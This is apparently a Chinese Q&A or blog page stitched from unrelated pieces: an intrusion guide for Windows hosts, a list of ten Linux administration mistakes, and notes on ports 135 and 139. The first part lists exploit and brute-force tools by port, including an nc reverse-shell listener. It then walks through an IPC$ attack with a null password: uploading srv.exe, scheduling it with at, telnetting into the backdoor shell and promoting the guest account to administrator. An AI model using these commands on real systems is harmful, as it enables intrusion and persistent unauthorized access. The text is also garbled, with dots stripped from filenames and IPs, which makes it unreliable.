
1 1433端口入侵
scanportexe 查有1433的机器
SQLScanPassexe 进行字典暴破(字典是关键)
最后 SQLToolsexe入侵
对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloFexe 入侵ip 1433 本机ip 本机端口
(以上反向的,测试成功)
sqlhellozexe 入侵ip 1433 (这个是正向连接)
2 4899端口入侵
用4899过滤器exe,扫描空口令的机器
3 3899的入侵
对很早的机器,可以试试3389的溢出(win3389exexe)
对2000的机器,可以试试字典暴破。(tscrackexe)
4 80入侵
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfileexe或dvup_delphiexe)
可以利用SQL进行注入。(啊D的注入软件)。
5 serv-u入侵(21端口)
对5 004及以下系统,可用溢出入侵。(serv5004exe)
对5100及以下系统,可用本地提升权限。(servlocalexe)
对serv-u的MD5加密密码,可以用字典暴破。(crackvbs)
输入一个被serv-u加密的密码(34位长),通过与字典档(dicttxt)的比较,得到密码
6 554端口
用real554exe入侵。
7 6129端口
用DameWare6129exe入侵。
8 系统漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
进行溢出入侵。
9 3127等端口
可以利用doom病毒开的端口,用nodoomexe入侵。(可用mydoomscanexe查)。
10 其他入侵
利用shanlu的入侵软件入侵(WINNTAutoAttackexe)。
经典IPC$入侵
1 C:\>net use $">\\127001\IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127001建立一个连
接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名
,输入administrators,命令即可成功完成。
2 C:\>copy srvexe $">\\127001\admin$
先复制srvexe上去,在流光的Tools目录下就有(这里的$是指admin用户的
c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3 C:\>net time \\127001
查查时间,发现127001 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4 C:\>at \\127001 11:05 srvexe
用at命令启动srvexe吧(这里设置的时间要比主机时间快,不然你怎么启动啊
5 C:\>net time \\127001
再查查到时间没有?如果127001 的当前时间是 2002/3/19 上午 11:05,那就准备
开始下面的命令。
6 C:\>telnet 127001 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打
算建立一个Telnet服务!这就要用到ntlm了
7C:\>copy ntlmexe $">\\127001\admin$
用Copy命令把ntlmexe上传到主机上(ntlmexe也是在《流光》的Tools目录中)。
8 C:\WINNT\system32>ntlm
输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这
个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使
用"net start telnet"来开启Telnet服务!
9 Telnet 127001,接着输入用户名与密码就进入对方了, *** 作就像在DOS上 *** 作
一样简单!(然后你想做什么想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10 C:\>net user guest /active:yes
将对方的Guest用户激活
11 C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12 C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我
们可以用guest再次访问这台计算机)FTP的安全问题可以在FTP的配置文件里修改就好了。
远程登陆弱口令。需要自己更改就行。
具体的方法你百度有很多的图文教程,这里给你写也写不完。。。。太长了
望采纳,谢谢!linux管理常见错误一:随意许可,原因是不理解许可
如果对许可配置不当,就会给黑客留下机会。处理许可问题的最简单方法是使用所谓的RWE方法,即Read(读取)、Write(写入)、Execute(执行)。假设你想让一个用户能够读取一个文件但不能写入文件。为此,你可以执行:chmod
u+w,u-rx 文件名,一些新用户可能会看到一个错误,说他们没有使用文件的许可,因此他们就使用了:Chmod 777
文件名,以为这样能够避免问题。但这样做实际上会导致更多的问题,因为它给了文件的可执行的权限。
记住这一点:777将一个文件的读取、写入、执行的许可给了所有用户,666将一个文件的读取、写入权限给了所有用户,而555将文件的读取、执行权限给了所有用户,还有444、333、222、111等等。
linux管理常见错误二:忽视更新
这并不是说Linux管理员缺乏技巧。不过,许多Linux管理员在运行了Linux之后,以为日后就无事可做了,以为它安全可靠。其实,新的更新可以为一些新的漏洞打上补丁。维持更新可以在一个易受损的系统与一个安全的系统之间构造分水岭。Linux的安全来自于不断地维护。为了实现安全性,为了使用一些新的特性和稳定性,任何管理员都应当跟上Linux的更新步伐。
linux管理常见错误三:不经过严格审核,从多种渠道下载安装各种类型的应用程序
乍看起来,这也许是一个不错的主意。如果你在运行Ubuntu,你会知道包管理程序使用的是。deb软件包。不过,你找到的许多应用程序是以源代码的形式提供的。没有问题吗这些程序安装后也许能够正常工作。但是你为什么不能随意安装程序呢道理很简单,如果你以源的形式安装了程序,那么,你的软件包管理系统将无法跟踪你所安装的东西。
因此,在程序包A(以源的形式安装)依赖于程序包B(从一个。deb库安装的),而软件包B是从更新管理器更新的时候,会发生什么事情呢程序包A可能运行,也可能无法运行。不过,如果程序包A和B都从。deb库安装的话,二者都能运行的机会将更高。此外,在所有的程序包都来自于同样的二进制类型时,更新程序包将更为容易。
linux管理常见错误四:将服务器启动进入到X
在一台机器是专用服务器时,你可能会想到安装X,这样一些管理任务就会简单一些。不过,这并不意味着用户需要将服务器启动进入到X这样会浪费珍贵的内存和CPU资源。相反地,你应当在级别3上停止启动过程,进入命令行模式。这样做不但会将所有的资源留给服务器,而且还会防止泄露机器的机密。要登录到X,用户只需要以命令行方式登录,然后键入startx进入到桌面。
linux管理常见错误五:糟糕的口令
记住,root
的口令通常是linux王国的关键。所以为什么要让root的口令那么容易被破解呢保障你的用户口令的健壮性至关重要。如果你的口令比较长,且难于记忆,可将这个口令存放在一个可被加密的位置。在需要这个口令时,可用解密软件解开这个口令使用之。
linux管理常见错误六:没有备份关键的配置文件
许多管理员都有这样的体会,在升级到某个X版本,如X11之后,却发现新版本破坏了你的xorgconf配置文件,以至于你再也无法使用X建议你在升级X之前,先对以前的/etc/x11/xorgconf作一个备份,以免升级失败。当然,X的升级程序会设法为用户备份xorgconf文件,但它却在/etc/x11目录内备份。即使这种备份看起来不错,你最好还是自己做一个备份吧。笔者的一个习惯是将其备份到/root目录中,这样,用户就可以知道只有根(root)用户能够访问此文件。记住,安全第一。这里的方法也适用于其它的关键备份,如Samba、Apache、Mysql等。
linux管理常见错误七:忽视日志文件
/var/log的存在是有理由的。这是存放所有的日志文件的唯一位置。在发生问题时,你首先需要看一下这里。检查安全问题,可看一下/var/log/secure笔者看的第一个位置是/var/log/messages这个日志文件保存着所有的一般性错误。在此文件中,你可以得到关于网络、媒体变更等消息。在管理一台机器时,用户可以使用某个第三方的应用程序,如logwatch,这样就可以创建为用户创建基于/var/log文件的各种报告。
linux管理常见错误八:没有安装一个可正常运行的内核
你可能不会在一台机器上安装10个以上的内核。但你需要更新内核,这种更新并没有删除以前的内核。你是怎么做的呢你一直保持使用最近的可正常工作的内核。假设你目前正常工作的内核是2622,而2620是备份内核。如果你更新到2626,而在新内核中一切都工作正常,你就可以删除2620了。
linux管理常见错误九:逃避使用命令行
恐怕很少有人愿意记住那么多命令。在大多数情况下,图形用户界面是许多人的最爱。不过,有时,命令行使用起来更加容易、快捷、安全、可靠。逃避使用命令行是Linux管理的大忌。管理员至少应当理解命令行是如何工作的,至少还要掌握一些重要的管理命令。
linux管理常见错误十:以根用户身份登录
这是一种很危险的错误。如果用户需要根特权来执行或配置一个应用程序,可以在一个标准的用户账户中使用su切换到root用户。登录到root为什么不是一件好事儿在用户以标准用户身份登录时,所有正在运行的X应用程序仍拥有仅限于此用户的访问权。如果用户以根用户身份登录,X就拥有了root的许可。这就会导致两个问题,一、如果用户由GUI犯了一个大错,这个错误对系统来说,有可能是一个巨大的灾难。二、以根用户的身份运行X使得系统更易于遭受攻击。每一项服务都对应相应的端口,比如众如周知的>
参考资料:
端口说明:135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码;使用DCOM可以通过网络直接进行通信,能够跨包括>
139号端口 NetBIOS服务(即共享服务)。
80号端口 >
139端口作用:139端口主要是为NetBIOS Session Service设备提供的辅助端口,是用于提供Windows文件和打印机共享文件的重要连接方式,以及和Unix的Samba服务进行一系列的校正。
139端口入侵:当确定一台主机的139端口存在漏洞时,我们可以用扫描工具进行扫描,比如SUPERSCAN这个端口扫描工具。我们可以使用nbtstat -a IP这个命令得到用户的情况。然后通过桥接,完成其计算机的资料共享。
139端口实现共享功能:139端口可以为我么实现漏洞的修复,比如在Windows 98中,我们可以打开“控制面板”,然后双击“网络”图标,在“配置”的选项卡中单击“文件及打印共享”按钮选择相应的设置就可以安装启用文件共享服务。
同样在Windows 2000/XP中,也可以按照以上的步骤打开“控制面板”,双击“网络连接”图标,然后打开本地连接属性,在属性窗口的“常规”选项卡中选择“Internet协议”,在单击“属性”按钮,然后在打开的窗口中,继续单击“高级”按钮,在“高级TCP/IP设置”窗口中选择“WINS”选项卡,在“NetBIOS设置”区域中启用TCP/IP上的文件共享服务。
139端口漏洞:虽然开启139端口虽然可以实现共享服务,但是139端口存在的一些漏洞,常常会被不法分子所利用,然后进行窃取文件。比如使用流光、SuperScan等端口扫描工具,就可以扫描目标计算机的139端口,如果发现有漏洞,窃取者就会试图获取用户名和密码,这是非常危险的。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)